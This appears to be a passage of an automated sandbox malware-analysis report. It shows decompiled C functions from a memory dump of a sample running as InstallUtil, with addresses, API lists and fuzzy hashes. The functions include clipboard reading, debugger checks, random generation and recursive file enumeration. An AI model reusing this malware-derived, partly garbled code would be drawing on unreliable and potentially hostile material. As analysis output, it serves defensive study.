						_t119 =  *((intOrPtr*)(_t92 + 0x50));
						_t127 = _t119 + 2;
						do {
							_t90 =  *_t119;
							_t119 = _t119 + 2;
							__eflags = _t90 - _v252;
						} while (_t90 != _v252);
						__eflags = _t119 - _t127 >> 1 -  *(_t92 + 0x5c);
						if(_t119 - _t127 >> 1 ==  *(_t92 + 0x5c)) {
							_t129[1] = _t132;
						}
					} else {
						 *_t129 =  *_t129 | 0x00000304;
						_t129[1] = _t132;
						L17:
						_t129[2] = _t132;
					}
					goto L18;
				}
				L1:
				 *_t129 =  *_t129 & 0x00000000;
				goto L2;
			}

0x0044de3f
0x0044de46
0x0044de54
0x0044de5c
0x0044de6b
0x0044de77
0x0044de90
0x0044dea7
0x0044deac
0x0044deb5
0x0044deb7
0x0044df6a
0x0044df73
0x0044df75
0x0044e067
0x0044e06e
0x0044e071
0x0044e081
0x0044e081
0x0044df88
0x0044df99
0x0044df9f
0x0044dfa1
0x0044dfb4
0x0044dfbb
0x0044dfbd
0x0044e029
0x0044e02c
0x00000000
0x00000000
0x0044e02e
0x0044e031
0x00000000
0x00000000
0x0044e03d
0x0044e044
0x0044e046
0x00000000
0x00000000
0x0044e048
0x0044e04d
0x0044e055
0x0044e057
0x00000000
0x00000000
0x0044e059
0x0044e05f
0x0044e062
0x0044e062
0x0044e064
0x0044e064
0x00000000
0x0044e062
0x0044dfbf
0x0044dfc5
0x0044dfc7
0x0044dfca
0x0044dfdc
0x0044dfdf
0x00000000
0x00000000
0x0044dfe1
0x0044dfe7
0x0044dfed
0x0044dfed
0x0044dff0
0x0044dff3
0x0044dff3
0x0044e004
0x0044e007
0x0044e023
0x00000000
0x0044e023
0x0044e009
0x0044e00d
0x0044e015
0x0044e017
0x00000000
0x00000000
0x0044e019
0x0044e01f
0x0044dfd4
0x0044dfd4
0x00000000
0x0044dfd4
0x0044dfcc
0x0044dfcc
0x0044dfcc
0x0044dfd2
0x00000000
0x0044dfd2
0x0044dfa3
0x0044de95
0x00000000
0x0044de97
0x0044decb
0x0044ded9
0x0044dedf
0x0044dee1
0x00000000
0x00000000
0x0044deed
0x0044def3
0x0044def4
0x0044def6
0x0044df03
0x0044df06
0x00000000
0x00000000
0x0044df08
0x0044df0c
0x0044df50
0x0044df50
0x0044df52
0x0044df55
0x00000000
0x00000000
0x0044df58
0x0044df5e
0x0044df60
0x00000000
0x00000000
0x0044df62
0x0044df62
0x0044df65
0x00000000
0x0044df65
0x0044df1b
0x0044df20
0x0044df23
0x0044df25
0x00000000
0x00000000
0x0044df27
0x0044df27
0x0044df2a
0x0044df2d
0x0044df30
0x0044df33
0x0044df33
0x0044df36
0x0044df39
0x0044df39
0x0044df46
0x0044df49
0x0044df4b
0x0044df4b
0x0044def8
0x0044def8
0x0044defe
0x0044df67
0x0044df67
0x0044df67
0x00000000
0x0044def6
0x0044de92
0x0044de92
0x00000000

APIs

Part of subcall function 00444255: GetLastError.KERNEL32(?,0043DA65,00437135,0043DA65,0046E278,?,0043B7CA,FF8BC35D,0046E278,0046E278), ref: 00444259
Part of subcall function 00444255: _free.LIBCMT ref: 0044428C
Part of subcall function 00444255: SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442CD
Part of subcall function 00444255: _abort.LIBCMT ref: 004442D3

Part of subcall function 00444255: _free.LIBCMT ref: 004442B4
Part of subcall function 00444255: SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442C1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044DE88
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044DED9
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044DF99

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: 282798828c2090434eda66c946f1a0a829911001e56b45a11fccb827842a3a93
Instruction ID: d0f19ad155b35f457c489507ed77437171f7a75c9abad1e430859b1a56a4cb88
Opcode Fuzzy Hash: 282798828c2090434eda66c946f1a0a829911001e56b45a11fccb827842a3a93
Instruction Fuzzy Hash: E761B0719006179BFB289F25CC82BBA77A8FF04304F1440BAE916C6685F77CD995CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00438462 Relevance: 4.6, APIs: 3, Instructions: 78
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E00438462(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x46c00c; // 0xe1ce05e9
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E004314E2(_t41);
					_pop(_t62);
				}
				E004337A0(_t67,  &_v804, 0, 0x50);
				E004337A0(_t67,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t25 =  &_v0; // 0x4
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // -808
				if(UnhandledExceptionFilter(_t36) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E004314E2(_t57);
				}
				return E004318FB(_v8 ^ _t70);
			}

0x00438462
0x00438462
0x00438462
0x00438462
0x0043846d
0x00438472
0x00438474
0x0043847c
0x0043847e
0x00438481
0x00438486
0x00438486
0x00438492
0x004384a5
0x004384b3
0x004384b9
0x004384bf
0x004384c5
0x004384cb
0x004384d1
0x004384d7
0x004384dd
0x004384e3
0x004384e9
0x004384f0
0x004384f7
0x004384fe
0x00438505
0x0043850c
0x00438513
0x00438514
0x0043851d
0x00438523
0x00438523
0x00438526
0x0043852c
0x00438539
0x00438542
0x0043854b
0x00438554
0x00438562
0x00438564
0x0043856a
0x00438579
0x00438585
0x00438588
0x0043858d
0x0043859c

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0043855A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00438564
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0000000A), ref: 00438571

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 60d780e7756b548f83dad1740ac2ae1f518c3056e7f36b6710a0de99be365804
Instruction ID: d8ead26e8eb37d6fb88bd96035dd9e947152768fc60bb89449107110943e61ac
Opcode Fuzzy Hash: 60d780e7756b548f83dad1740ac2ae1f518c3056e7f36b6710a0de99be365804
Instruction Fuzzy Hash: 8431D77490131C9BCB21DF68D98879DB7B4BF08310F5056EAE80CA7261EB349F818F49

Uniqueness

Uniqueness Score: -1.00%

Function 00430185 Relevance: 4.5, APIs: 3, Instructions: 30
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00430185(HCRYPTPROV* __ecx, BYTE* __edx) {
				int _v12;
				void* _t6;
				BYTE* _t9;
				long** _t10;

				_t10 = __ecx;
				_t9 = __edx;
				if(CryptAcquireContextA(__ecx, 0, 0, 1, 0xf0000000) != 0) {
					if(CryptGenRandom( *_t10, _v12, _t9) != 0) {
						CryptReleaseContext( *_t10, 0);
						return 0;
					}
					_push(0xffffff98);
					L2:
					_pop(_t6);
					return _t6;
				}
				_push(0xffffff99);
				goto L2;
			}

0x00430190
0x00430192
0x0043019f
0x004301b5
0x004301bf
0x00000000
0x004301c5
0x004301b7
0x004301a3
0x004301a3
0x00000000
0x004301a3
0x004301a1
0x00000000

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,0042FE0D,00000034,?,?,00000000), ref: 00430197
CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,0042FEA0,00000000,?,00000000), ref: 004301AD
CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,0042FEA0,00000000,?,00000000,0041ABED), ref: 004301BF

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: e450df584ea5b7981e6163142a62199a4d5d447799bcb4ef5617650616cf7cca
Instruction ID: 8c19ee37d78214cc7255f079126727531d1bf265bd319b2ac3cca30d71e1d02a
Opcode Fuzzy Hash: e450df584ea5b7981e6163142a62199a4d5d447799bcb4ef5617650616cf7cca
Instruction Fuzzy Hash: C9E06D31248310BEEF300E11AC28F172AA49BC9B65F31072AB255A80E4C2628841951C

Uniqueness

Uniqueness Score: -1.00%

Function 0043F394 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0043F394(int _a4) {
				void* _t14;
				void* _t16;

				if(E00444D09(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E0043F419(_t14, _t16, _a4);
				ExitProcess(_a4);
			}

0x0043f3a0
0x0043f3bc
0x0043f3bc
0x0043f3c5
0x0043f3ce

APIs

GetCurrentProcess.KERNEL32(00000000,?,0043F36A,00000000,004691D8,0000000C,0043F4C1,00000000,00000002,00000000), ref: 0043F3B5
TerminateProcess.KERNEL32(00000000,?,0043F36A,00000000,004691D8,0000000C,0043F4C1,00000000,00000002,00000000), ref: 0043F3BC
ExitProcess.KERNEL32 ref: 0043F3CE

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: dfe48a097deb0ce11edccffe6d2230c46e7e30a02a52b9740d55dd81f0a25627
Instruction ID: 4d6c8b4d373b1f8d15033edefb586c9001b308c8244c70771d91f277b0f902be
Opcode Fuzzy Hash: dfe48a097deb0ce11edccffe6d2230c46e7e30a02a52b9740d55dd81f0a25627
Instruction Fuzzy Hash: 75E08C31400218AFCF016F20ED08A493B29EF9438AF005076FC098B232DB39ECD2CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00409D9C Relevance: 4.5, APIs: 3, Instructions: 19
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00409D9C(intOrPtr _a4) {
				intOrPtr _v0;
				void* _t8;
				void* _t10;
				void* _t11;
				void* _t12;

				if(OpenClipboard(0) == 0) {
					L3:
					_push(0x4610ec);
				} else {
					_t11 = GetClipboardData(0xd);
					CloseClipboard();
					if(_t11 == 0) {
						goto L3;
					} else {
						_push(_t11);
					}
				}
				E0040413E(_t8, _a4, _t10, _t12);
				return _v0;
			}

0x00409da7
0x00409dc0
0x00409dc0
0x00409da9
0x00409db1
0x00409db3
0x00409dbb
0x00000000
0x00409dbd
0x00409dbd
0x00409dbd
0x00409dbb
0x00409dc9
0x00409dd3

APIs

OpenClipboard.USER32(00000000), ref: 00409D9F
GetClipboardData.USER32 ref: 00409DAB
CloseClipboard.USER32 ref: 00409DB3

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseDataOpen
String ID:
API String ID: 2058664381-0
Opcode ID: 17b2bec9b75883c6a8f5f3f89a5873973adf657650172498db161f82f9f16dcc
Instruction ID: b6001045a0f8cdf14df5ef5e9a4310174d621cee8e19ab2e889570e8d57e3b75
Opcode Fuzzy Hash: 17b2bec9b75883c6a8f5f3f89a5873973adf657650172498db161f82f9f16dcc
Instruction Fuzzy Hash: 37E0C270388321D7D6205BA0EC0CB4F7A549F80B13F00403AB909AA2E6C734DC80C6AD

Uniqueness

Uniqueness Score: -1.00%

Function 00431590 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00431590(intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _t51;
				signed int _t53;
				signed int _t56;
				signed int _t57;
				intOrPtr _t59;
				signed int _t60;
				signed int _t62;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr* _t70;
				intOrPtr _t76;
				intOrPtr _t81;
				intOrPtr* _t83;
				signed int _t84;
				signed int _t87;

				_t81 = __edx;
				 *0x46cd0c =  *0x46cd0c & 0x00000000;
				 *0x46c010 =  *0x46c010 | 1;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L20:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				 *0x46c010 =  *0x46c010 | 0x00000002;
				 *0x46cd0c = 1;
				_t83 =  &_v44;
				_push(1);
				asm("cpuid");
				_pop(_t67);
				 *_t83 = 0;
				 *((intOrPtr*)(_t83 + 4)) = 1;
				 *((intOrPtr*)(_t83 + 8)) = 0;
				 *((intOrPtr*)(_t83 + 0xc)) = _t81;
				_v12 = _v44;
				_t51 = 1;
				_t76 = 0;
				_push(1);
				asm("cpuid");
				_pop(_t68);
				 *_t83 = _t51;
				 *((intOrPtr*)(_t83 + 4)) = _t67;
				 *((intOrPtr*)(_t83 + 8)) = _t76;
				 *((intOrPtr*)(_t83 + 0xc)) = _t81;
				if((_v32 ^ 0x49656e69 | _v36 ^ 0x6c65746e | _v40 ^ 0x756e6547) != 0) {
					L9:
					_t84 =  *0x46cd10; // 0x2
					L10:
					_v28 = _v32;
					_t53 = _v36;
					_v8 = _t53;
					_v24 = _t53;
					if(_v12 >= 7) {
						_t59 = 7;
						_push(_t68);
						asm("cpuid");
						_t70 =  &_v44;
						 *_t70 = _t59;
						 *((intOrPtr*)(_t70 + 4)) = _t68;
						 *((intOrPtr*)(_t70 + 8)) = 0;
						 *((intOrPtr*)(_t70 + 0xc)) = _t81;
						_t60 = _v40;
						_v20 = _t60;
						_t53 = _v8;
						if((_t60 & 0x00000200) != 0) {
							 *0x46cd10 = _t84 | 0x00000002;
						}
					}
					if((_t53 & 0x00100000) != 0) {
						 *0x46c010 =  *0x46c010 | 0x00000004;
						 *0x46cd0c = 2;
						if((_t53 & 0x08000000) != 0 && (_t53 & 0x10000000) != 0) {
							asm("xgetbv");
							_v16 = _t53;
							_v12 = _t81;
							if((_v16 & 0x00000006) == 6 && 0 == 0) {
								_t56 =  *0x46c010; // 0x2f
								_t57 = _t56 | 0x00000008;
								 *0x46cd0c = 3;
								 *0x46c010 = _t57;
								if((_v20 & 0x00000020) != 0) {
									 *0x46cd0c = 5;
									 *0x46c010 = _t57 | 0x00000020;
								}
							}
						}
					}
					goto L20;
				}
				_t62 = _v44 & 0x0fff3ff0;
				if(_t62 == 0x106c0 || _t62 == 0x20660 || _t62 == 0x20670 || _t62 == 0x30650 || _t62 == 0x30660 || _t62 == 0x30670) {
					_t87 =  *0x46cd10; // 0x2
					_t84 = _t87 | 0x00000001;
					 *0x46cd10 = _t84;
					goto L10;
				} else {
					goto L9;
				}
			}

0x00431590
0x00431593
0x004315a1
0x004315b0
0x00431723
0x00431729
0x00431729
0x004315b6
0x004315bc
0x004315c7
0x004315cd
0x004315d0
0x004315d1
0x004315d5
0x004315d6
0x004315d8
0x004315db
0x004315de
0x004315e7
0x00431606
0x00431609
0x0043160a
0x0043160b
0x0043160f
0x00431610
0x00431612
0x00431615
0x00431618
0x0043161b
0x00431660
0x00431660
0x00431666
0x0043166d
0x00431670
0x00431673
0x00431676
0x00431679
0x0043167d
0x00431680
0x00431681
0x00431686
0x00431689
0x0043168b
0x0043168e
0x00431691
0x00431694
0x0043169c
0x0043169f
0x004316a2
0x004316a7
0x004316a7
0x004316a2
0x004316b4
0x004316b6
0x004316bd
0x004316cc
0x004316d7
0x004316da
0x004316dd
0x004316ee
0x004316f4
0x004316f9
0x004316fc
0x0043170a
0x0043170f
0x00431714
0x0043171e
0x0043171e
0x0043170f
0x004316ee
0x004316cc
0x00000000
0x004316b4
0x00431620
0x0043162a
0x0043164f
0x00431655
0x00431658
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 004315A9

Strings

, xrefs: 00431706

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-3916222277
Opcode ID: d8f0f408a1037e6a745e9f14f672f98dcfecb818b286f5e332338d316d3fa74f
Instruction ID: efc67b71bf89e931ff6da2cc53dc2d1280d36070dc6e1e45baae83c0375aaaea
Opcode Fuzzy Hash: d8f0f408a1037e6a745e9f14f672f98dcfecb818b286f5e332338d316d3fa74f
Instruction Fuzzy Hash: BC41C1B19002058FEB14CF99E8867AABBF4FB48354F28957BD445E7360E3B89910CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0044A569 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0044A569(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				signed int _t62;
				signed int _t65;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t78;
				CHAR* _t79;
				intOrPtr* _t83;
				intOrPtr _t85;
				void* _t87;
				intOrPtr* _t88;
				signed int _t92;
				signed int _t96;
				void* _t101;
				intOrPtr _t102;
				signed int _t105;
				union _FINDEX_INFO_LEVELS _t106;
				void* _t111;
				intOrPtr _t112;
				void* _t113;
				signed int _t118;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t122;

				_push(__ecx);
				_t83 = _a4;
				_t2 = _t83 + 1; // 0x1
				_t101 = _t2;
				do {
					_t35 =  *_t83;
					_t83 = _t83 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t105 = _a12;
				_t85 = _t83 - _t101 + 1;
				_v8 = _t85;
				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t105 + 1; // 0x1
					_t78 = _t5 + _t85;
					_t111 = E00441BB3(_t85, _t78, 1);
					_pop(_t87);
					__eflags = _t105;
					if(_t105 == 0) {
						L6:
						_push(_v8);
						_t78 = _t78 - _t105;
						_t40 = E0043AD93(_t87, _t111 + _t105, _t78, _a4);
						_t120 = _t119 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t72 = E0044A7A8(_a16, __eflags, _t111);
							E004427C2(0);
							_t74 = _t72;
							goto L8;
						}
					} else {
						_push(_t105);
						_t75 = E0043AD93(_t87, _t111, _t78, _a8);
						_t120 = _t119 + 0x10;
						__eflags = _t75;
						if(_t75 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00438659();
							asm("int3");
							_t118 = _t120;
							_t121 = _t120 - 0x150;
							_t43 =  *0x46c00c; // 0xe1ce05e9
							_v48 = _t43 ^ _t118;
							_t88 = _v32;
							_push(_t78);
							_t79 = _v36;
							_push(_t111);
							_t112 = _v332.cAlternateFileName;
							_push(_t105);
							_v372 = _t112;
							while(1) {
								__eflags = _t88 - _t79;
								if(_t88 == _t79) {
									break;
								}
								_t45 =  *_t88;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t88 = E00451FF0(_t79, _t88);
											continue;
										}
									}
								}
								break;
							}
							_t102 =  *_t88;
							__eflags = _t102 - 0x3a;
							if(_t102 != 0x3a) {
								L19:
								_t106 = 0;
								__eflags = _t102 - 0x2f;
								if(_t102 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t102 - 0x5c;
									if(_t102 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t102 - 0x3a;
										if(_t102 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t90 = _t88 - _t79 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
								E004337A0(_t106,  &_v332, _t106, 0x140);
								_t122 = _t121 + 0xc;
								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
								_t55 = _v336;
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t92;
									_t93 = _t92 >> 2;
									_v344 = _t92 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E0044A569(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
											_t122 = _t122 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t93 = _v287;
											__eflags = _t93;
											if(_t93 == 0) {
												goto L37;
											} else {
												__eflags = _t93 - 0x2e;
												if(_t93 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t113,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t103 =  *_t55;
									_t96 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t96 - _t65;
									if(_t96 != _t65) {
										E0043A360(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E0044A3C1);
									}
								} else {
									_push(_t55);
									_t57 = E0044A569(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
									L26:
									_t106 = _t57;
								}
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									FindClose(_t113);
								}
							} else {
								__eflags = _t88 -  &(_t79[1]);
								if(_t88 ==  &(_t79[1])) {
									goto L19;
								} else {
									_push(_t112);
									E0044A569(_t79, _t88, 0, _t112, _t79, 0, 0);
								}
							}
							__eflags = _v12 ^ _t118;
							return E004318FB(_v12 ^ _t118);
						} else {
							goto L6;
						}
					}
				} else {
					_t74 = 0xc;
					L8:
					return _t74;
				}
				L40:
			}

0x0044a56e
0x0044a56f
0x0044a572
0x0044a572
0x0044a575
0x0044a575
0x0044a577
0x0044a578
0x0044a581
0x0044a582
0x0044a585
0x0044a588
0x0044a58d
0x0044a594
0x0044a595
0x0044a596
0x0044a599
0x0044a5a3
0x0044a5a6
0x0044a5a7
0x0044a5a9
0x0044a5bd
0x0044a5bd
0x0044a5c0
0x0044a5ca
0x0044a5cf
0x0044a5d2
0x0044a5d4
0x00000000
0x0044a5d6
0x0044a5da
0x0044a5e3
0x0044a5e9
0x00000000
0x0044a5ec
0x0044a5ab
0x0044a5ab
0x0044a5b1
0x0044a5b6
0x0044a5b9
0x0044a5bb
0x0044a5f2
0x0044a5f4
0x0044a5f5
0x0044a5f6
0x0044a5f7
0x0044a5f8
0x0044a5f9
0x0044a5fe
0x0044a602
0x0044a604
0x0044a60a
0x0044a611
0x0044a614
0x0044a617
0x0044a618
0x0044a61b
0x0044a61c
0x0044a61f
0x0044a620
0x0044a641
0x0044a641
0x0044a643
0x00000000
0x00000000
0x0044a628
0x0044a62a
0x0044a62c
0x0044a62e
0x0044a630
0x0044a632
0x0044a634
0x0044a63f
0x00000000
0x0044a63f
0x0044a634
0x0044a630
0x00000000
0x0044a62c
0x0044a645
0x0044a647
0x0044a64a
0x0044a663
0x0044a663
0x0044a665
0x0044a668
0x0044a678
0x0044a67a
0x0044a67a
0x0044a66a
0x0044a66a
0x0044a66d
0x00000000
0x0044a66f
0x0044a66f
0x0044a672
0x00000000
0x0044a674
0x0044a674
0x0044a674
0x0044a672
0x0044a66d
0x0044a680
0x0044a688
0x0044a68c
0x0044a69a
0x0044a69f
0x0044a6b4
0x0044a6b6
0x0044a6bc
0x0044a6bf
0x0044a6f1
0x0044a6f1
0x0044a6f3
0x0044a6f6
0x0044a6fc
0x0044a6fc
0x0044a703
0x0044a71d
0x0044a71d
0x0044a72c
0x0044a731
0x0044a734
0x0044a736
0x00000000
0x00000000
0x00000000
0x00000000
0x0044a705
0x0044a705
0x0044a70b
0x0044a70d
0x00000000
0x0044a70f
0x0044a70f
0x0044a712
0x00000000
0x0044a714
0x0044a714
0x0044a71b
0x00000000
0x00000000
0x00000000
0x00000000
0x0044a71b
0x0044a712
0x0044a70d
0x00000000
0x0044a738
0x0044a740
0x0044a746
0x0044a748
0x0044a748
0x0044a750
0x0044a755
0x0044a75d
0x0044a760
0x0044a762
0x0044a776
0x0044a77b
0x0044a6c1
0x0044a6c1
0x0044a6c5
0x0044a6cd
0x0044a6cd
0x0044a6cd
0x0044a6cf
0x0044a6d2
0x0044a6d5
0x0044a6d5
0x0044a64c
0x0044a64f
0x0044a651
0x00000000
0x0044a653
0x0044a653
0x0044a659
0x0044a65e
0x0044a651
0x0044a6e2
0x0044a6ed
0x00000000
0x00000000
0x00000000
0x0044a5bb
0x0044a58f
0x0044a591
0x0044a5ed
0x0044a5f1
0x0044a5f1
0x00000000

Strings

., xrefs: 0044A6FC

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 855e5ffd67cf6413c4184acec50a9dad99493f472cfbe2526b57b4921a2182a2
Instruction ID: 37616a87b10b0f05af866122112d4014eed3d5bc4f51ad38fd421af02a543630
Opcode Fuzzy Hash: 855e5ffd67cf6413c4184acec50a9dad99493f472cfbe2526b57b4921a2182a2
Instruction Fuzzy Hash: F7313571840208BFEB248E78CC84EFB7BBDDB85308F0401AEF859D7251E6389E508B55

Uniqueness

Uniqueness Score: -1.00%

Function 0044DD0C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E0044DD0C(void* __ecx, void* __edx, char _a4) {
				void* __ebx;
				void* __ebp;
				intOrPtr _t26;
				intOrPtr _t29;
				signed int _t32;
				signed char _t33;
				signed char _t34;
				void* _t36;
				intOrPtr* _t39;
				intOrPtr* _t42;
				signed int _t48;
				void* _t51;
				void* _t52;
				signed int* _t53;
				void* _t54;
				signed int _t62;

				_t54 = E00444255(_t36, __ecx, __edx);
				_t48 = 2;
				_t39 =  *((intOrPtr*)(_t54 + 0x50));
				_t51 = _t39 + 2;
				do {
					_t26 =  *_t39;
					_t39 = _t39 + _t48;
				} while (_t26 != 0);
				_t42 =  *((intOrPtr*)(_t54 + 0x54));
